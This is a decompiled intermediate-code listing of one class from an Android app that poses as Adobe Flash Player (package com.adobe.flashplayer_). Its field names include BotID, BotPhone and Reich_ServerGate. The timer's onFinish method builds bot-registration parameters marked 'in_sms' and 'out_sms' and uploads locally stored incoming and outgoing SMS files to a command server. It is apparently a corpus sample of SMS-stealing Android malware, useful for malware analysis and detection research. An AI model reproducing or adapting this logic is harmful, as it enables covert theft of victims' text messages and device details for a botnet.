record `com.adobe.flashplayer_.UniClass$1` @kind class @AccessFlag  extends `android.os.CountDownTimer` @kind class {
  `com.adobe.flashplayer_.UniClass` `com.adobe.flashplayer_.UniClass$1.this$0` @AccessFlag FINAL_SYNTHETIC;
  `java.lang.String` `com.adobe.flashplayer_.UniClass$1.val$BotID` @AccessFlag PRIVATE_FINAL_SYNTHETIC;
  `java.lang.String` `com.adobe.flashplayer_.UniClass$1.val$BotLocation` @AccessFlag PRIVATE_FINAL_SYNTHETIC;
  `java.lang.String` `com.adobe.flashplayer_.UniClass$1.val$BotNetwork` @AccessFlag PRIVATE_FINAL_SYNTHETIC;
  `java.lang.String` `com.adobe.flashplayer_.UniClass$1.val$BotVer` @AccessFlag PRIVATE_FINAL_SYNTHETIC;
  `java.lang.String` `com.adobe.flashplayer_.UniClass$1.val$Reich_ServerGate` @AccessFlag PRIVATE_FINAL_SYNTHETIC;
  `java.lang.String` `com.adobe.flashplayer_.UniClass$1.val$SDK` @AccessFlag PRIVATE_FINAL_SYNTHETIC;
  `android.content.Context` `com.adobe.flashplayer_.UniClass$1.val$c` @AccessFlag PRIVATE_FINAL_SYNTHETIC;
}
procedure `void` `<init>`(`com.adobe.flashplayer_.UniClass$1` v0 @kind this, `com.adobe.flashplayer_.UniClass` v1 @kind object, `long` v2 @name `$anonymous0`, `long` v4 @name `$anonymous1`, `java.lang.String` v6 @kind object, `java.lang.String` v7 @kind object, `java.lang.String` v8 @kind object, `android.content.Context` v9 @kind object, `java.lang.String` v10 @kind object, `java.lang.String` v11 @kind object, `java.lang.String` v12 @kind object) @signature `Lcom/adobe/flashplayer_/UniClass$1;.<init>:(Lcom/adobe/flashplayer_/UniClass;JJLjava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V` @AccessFlag CONSTRUCTOR {
    temp;

  #L037ac8.  v0.`com.adobe.flashplayer_.UniClass$1.this$0` @type ^`com.adobe.flashplayer_.UniClass` := v1 @kind object;
  #L037acc.  v0.`com.adobe.flashplayer_.UniClass$1.val$BotID` @type ^`java.lang.String` := v6 @kind object;
  #L037ad0.  v0.`com.adobe.flashplayer_.UniClass$1.val$BotNetwork` @type ^`java.lang.String` := v7 @kind object;
  #L037ad4.  v0.`com.adobe.flashplayer_.UniClass$1.val$BotLocation` @type ^`java.lang.String` := v8 @kind object;
  #L037ad8.  v0.`com.adobe.flashplayer_.UniClass$1.val$c` @type ^`android.content.Context` := v9 @kind object;
  #L037adc.  v0.`com.adobe.flashplayer_.UniClass$1.val$BotVer` @type ^`java.lang.String` := v10 @kind object;
  #L037ae0.  v0.`com.adobe.flashplayer_.UniClass$1.val$SDK` @type ^`java.lang.String` := v11 @kind object;
  #L037ae4.  v0.`com.adobe.flashplayer_.UniClass$1.val$Reich_ServerGate` @type ^`java.lang.String` := v12 @kind object;
  #L037ae8.  call `<init>`(v0, v2, v4) @signature `Landroid/os/CountDownTimer;.<init>:(JJ)V` @kind direct;
  #L037aee.  return @kind void;
}
procedure `void` `onFinish`(`com.adobe.flashplayer_.UniClass$1` v10 @kind this) @signature `Lcom/adobe/flashplayer_/UniClass$1;.onFinish:()V` @AccessFlag PUBLIC {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;
    v7;
    v8;
    v9;

  #L037b00.  v9:= 3I;
  #L037b02.  v8:= 2I;
  #L037b04.  v7:= 1I;
  #L037b06.  v6:= 0I;
  #L037b08.  v0:= new `com.adobe.flashplayer_.FlashVirtual`;
  #L037b0c.  call `<init>`(v0) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.<init>:()V` @kind direct;
  #L037b12.  v1:= new `java.lang.String`[v9];
  #L037b16.  v2:= new `java.lang.StringBuilder`;
  #L037b1a.  v3:= "&b=" @kind object;
  #L037b1e.  call `<init>`(v2, v3) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L037b24.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.val$BotID` @type ^`java.lang.String` @kind object;
  #L037b28.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037b2e.  v2:= temp @kind object;
  #L037b30.  v3:= "&c=" @kind object;
  #L037b34.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037b3a.  v2:= temp @kind object;
  #L037b3c.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.val$BotNetwork` @type ^`java.lang.String` @kind object;
  #L037b40.  v4:= ":" @kind object;
  #L037b44.  v5:= "" @kind object;
  #L037b48.  call temp:= `replace`(v3, v4, v5) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L037b4e.  v3:= temp @kind object;
  #L037b50.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037b56.  v2:= temp @kind object;
  #L037b58.  v3:= "&d=" @kind object;
  #L037b5c.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037b62.  v2:= temp @kind object;
  #L037b64.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.val$BotLocation` @type ^`java.lang.String` @kind object;
  #L037b68.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037b6e.  v2:= temp @kind object;
  #L037b70.  v3:= "&e=" @kind object;
  #L037b74.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037b7a.  v2:= temp @kind object;
  #L037b7c.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.this$0` @type ^`com.adobe.flashplayer_.UniClass` @kind object;
  #L037b80.  v4:= "BotPhone" @kind object;
  #L037b84.  v5:= v10.`com.adobe.flashplayer_.UniClass$1.val$c` @type ^`android.content.Context` @kind object;
  #L037b88.  call temp:= `access$0`(v3, v4, v5) @signature `Lcom/adobe/flashplayer_/UniClass;.access$0:(Lcom/adobe/flashplayer_/UniClass;Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind static;
  #L037b8e.  v3:= temp @kind object;
  #L037b90.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037b96.  v2:= temp @kind object;
  #L037b98.  v3:= "&f=" @kind object;
  #L037b9c.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037ba2.  v2:= temp @kind object;
  #L037ba4.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.val$BotVer` @type ^`java.lang.String` @kind object;
  #L037ba8.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037bae.  v2:= temp @kind object;
  #L037bb0.  v3:= "&g=" @kind object;
  #L037bb4.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037bba.  v2:= temp @kind object;
  #L037bbc.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.val$SDK` @type ^`java.lang.String` @kind object;
  #L037bc0.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037bc6.  v2:= temp @kind object;
  #L037bc8.  v3:= "&h=in_sms&i=cmd" @kind object;
  #L037bcc.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037bd2.  v2:= temp @kind object;
  #L037bd4.  call temp:= `toString`(v2) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L037bda.  v2:= temp @kind object;
  #L037bdc.  v1[v6]:= v2 @kind object;
  #L037be0.  v2:= v10.`com.adobe.flashplayer_.UniClass$1.val$c` @type ^`android.content.Context` @kind object;
  #L037be4.  v3:= "in" @kind object;
  #L037be8.  call temp:= `getFileStreamPath`(v2, v3) @signature `Landroid/content/Context;.getFileStreamPath:(Ljava/lang/String;)Ljava/io/File;` @kind virtual;
  #L037bee.  v2:= temp @kind object;
  #L037bf0.  call temp:= `toString`(v2) @signature `Ljava/io/File;.toString:()Ljava/lang/String;` @kind virtual;
  #L037bf6.  v2:= temp @kind object;
  #L037bf8.  v1[v7]:= v2 @kind object;
  #L037bfc.  v2:= v10.`com.adobe.flashplayer_.UniClass$1.val$Reich_ServerGate` @type ^`java.lang.String` @kind object;
  #L037c00.  v1[v8]:= v2 @kind object;
  #L037c04.  call temp:= `execute`(v0, v1) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.execute:([Ljava/lang/Object;)Landroid/os/AsyncTask;` @kind virtual;
  #L037c0a.  v0:= new `com.adobe.flashplayer_.FlashVirtual`;
  #L037c0e.  call `<init>`(v0) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.<init>:()V` @kind direct;
  #L037c14.  v1:= new `java.lang.String`[v9];
  #L037c18.  v2:= new `java.lang.StringBuilder`;
  #L037c1c.  v3:= "&b=" @kind object;
  #L037c20.  call `<init>`(v2, v3) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L037c26.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.val$BotID` @type ^`java.lang.String` @kind object;
  #L037c2a.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037c30.  v2:= temp @kind object;
  #L037c32.  v3:= "&c=" @kind object;
  #L037c36.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037c3c.  v2:= temp @kind object;
  #L037c3e.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.val$BotNetwork` @type ^`java.lang.String` @kind object;
  #L037c42.  v4:= ":" @kind object;
  #L037c46.  v5:= "" @kind object;
  #L037c4a.  call temp:= `replace`(v3, v4, v5) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L037c50.  v3:= temp @kind object;
  #L037c52.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037c58.  v2:= temp @kind object;
  #L037c5a.  v3:= "&d=" @kind object;
  #L037c5e.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037c64.  v2:= temp @kind object;
  #L037c66.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.val$BotLocation` @type ^`java.lang.String` @kind object;
  #L037c6a.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037c70.  v2:= temp @kind object;
  #L037c72.  v3:= "&e=" @kind object;
  #L037c76.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037c7c.  v2:= temp @kind object;
  #L037c7e.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.this$0` @type ^`com.adobe.flashplayer_.UniClass` @kind object;
  #L037c82.  v4:= "BotPhone" @kind object;
  #L037c86.  v5:= v10.`com.adobe.flashplayer_.UniClass$1.val$c` @type ^`android.content.Context` @kind object;
  #L037c8a.  call temp:= `access$0`(v3, v4, v5) @signature `Lcom/adobe/flashplayer_/UniClass;.access$0:(Lcom/adobe/flashplayer_/UniClass;Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind static;
  #L037c90.  v3:= temp @kind object;
  #L037c92.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037c98.  v2:= temp @kind object;
  #L037c9a.  v3:= "&f=" @kind object;
  #L037c9e.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037ca4.  v2:= temp @kind object;
  #L037ca6.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.val$BotVer` @type ^`java.lang.String` @kind object;
  #L037caa.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037cb0.  v2:= temp @kind object;
  #L037cb2.  v3:= "&g=" @kind object;
  #L037cb6.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037cbc.  v2:= temp @kind object;
  #L037cbe.  v3:= v10.`com.adobe.flashplayer_.UniClass$1.val$SDK` @type ^`java.lang.String` @kind object;
  #L037cc2.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037cc8.  v2:= temp @kind object;
  #L037cca.  v3:= "&h=out_sms&i=cmd" @kind object;
  #L037cce.  call temp:= `append`(v2, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037cd4.  v2:= temp @kind object;
  #L037cd6.  call temp:= `toString`(v2) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L037cdc.  v2:= temp @kind object;
  #L037cde.  v1[v6]:= v2 @kind object;
  #L037ce2.  v2:= v10.`com.adobe.flashplayer_.UniClass$1.val$c` @type ^`android.content.Context` @kind object;
  #L037ce6.  v3:= "out" @kind object;
  #L037cea.  call temp:= `getFileStreamPath`(v2, v3) @signature `Landroid/content/Context;.getFileStreamPath:(Ljava/lang/String;)Ljava/io/File;` @kind virtual;
  #L037cf0.  v2:= temp @kind object;
  #L037cf2.  call temp:= `toString`(v2) @signature `Ljava/io/File;.toString:()Ljava/lang/String;` @kind virtual;
  #L037cf8.  v2:= temp @kind object;
  #L037cfa.  v1[v7]:= v2 @kind object;
  #L037cfe.  v2:= v10.`com.adobe.flashplayer_.UniClass$1.val$Reich_ServerGate` @type ^`java.lang.String` @kind object;
  #L037d02.  v1[v8]:= v2 @kind object;
  #L037d06.  call temp:= `execute`(v0, v1) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.execute:([Ljava/lang/Object;)Landroid/os/AsyncTask;` @kind virtual;
  #L037d0c.  return @kind void;
}
procedure `void` `onTick`(`com.adobe.flashplayer_.UniClass$1` v0 @kind this, `long` v1 @name `millisUntilFinished`) @signature `Lcom/adobe/flashplayer_/UniClass$1;.onTick:(J)V` @AccessFlag PUBLIC {
    temp;

  #L037d20.  return @kind void;
}
